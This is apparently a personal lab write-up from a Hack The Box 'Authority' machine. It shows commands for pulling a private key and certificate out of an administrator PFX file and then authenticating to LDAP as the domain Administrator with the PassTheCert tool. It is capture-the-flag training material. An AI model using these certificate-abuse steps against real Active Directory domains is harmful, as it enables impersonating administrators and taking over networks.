InfoSec LAB

Authority_PFX_Extraction

Created: 3 min read

PFX Extraction

As previously pointed out a lot can be done with PFX files since these files contains server certificates, intermediate certificates, and the private keys. it is entirely possible to extract a public(certificate) and private key pair from a PFX file.

(Pre-req) Unprotecting a PFX file (Not Needed)

┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy cert -export -pfx administrator.pfx -password "" -out unprotected.administrator.pfx       
Certipy v4.3.0 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'unprotected.administrator.pfx'

Since the original pfx file (administrator.pfx) is NOT protected by any mean but rather is a generated one with a valid domain credential, it is unnecessary to perform the exporting procedures shown above

Private Key

┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl pkcs12 -in ../administrator.pfx -nocerts -out administrator.pri
enter import password:
enter pem pass phrase:qwe123
verifying - enter pem pass phrase:qwe123

Extracting the private key from the administrator.pfx file Since the PFX file is generated with no password, I don’t need to provide one However, it prompts me to provide the passphrase for the private key. This is totally normal. A PEM key file must have a passphrase to be functional. I set it to qwe123

┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl rsa -in administrator.pri -out administrator.pri.decrypted
enter pass phrase for administrator.pri:qwe123
writing RSA key

Now that this is a private key, however, it is encrypted with the passphrase above the during the process of extraction; qwe123 So it needs to be decrypted again.

Public Key

┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl pkcs12 -in ../administrator.pfx -clcerts -nokeys -out administrator.pub
Enter Import Password:

Extracting the public(certificate) key from the administrator.pfx file Since it is a public(certificate) key, it does not prompts me for providing a passphrase unlike the private key. I don’t provide password here as well since there isn’t any

Validation

┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git   
Cloning into 'PassTheCert'...
remote: Enumerating objects: 109, done.
remote: Counting objects: 100% (109/109), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 109 (delta 47), reused 83 (delta 33), pack-reused 0
receiving objects: 100% (109/109), 44.73 KiB | 2.98 MiB/s, done.
resolving deltas: 100% (47/47), done.

according to the author’s blog, PassTheCert is a simple C# tool that can authenticate to an LDAP server using a client certificate, and perform actions that are interesting for an attacker. Unlike most other offensive tools, it has the added bonus of working in environments where LDAP Channel Binding is enabled, because Schannel authentication is, by design, not subject to Channel Binding.

┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ python3 PassTheCert/Python/passthecert.py -action whoami -crt administrator.pub -key administrator.pri.decrypted -domain AUTHORITY.HTB -dc-ip $IP -port 636 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
[*] you are logged in as: HTB\Administrator

Successfully validated. Moving on to Privilege Escalation phase

Interactive Graph View

Backlinks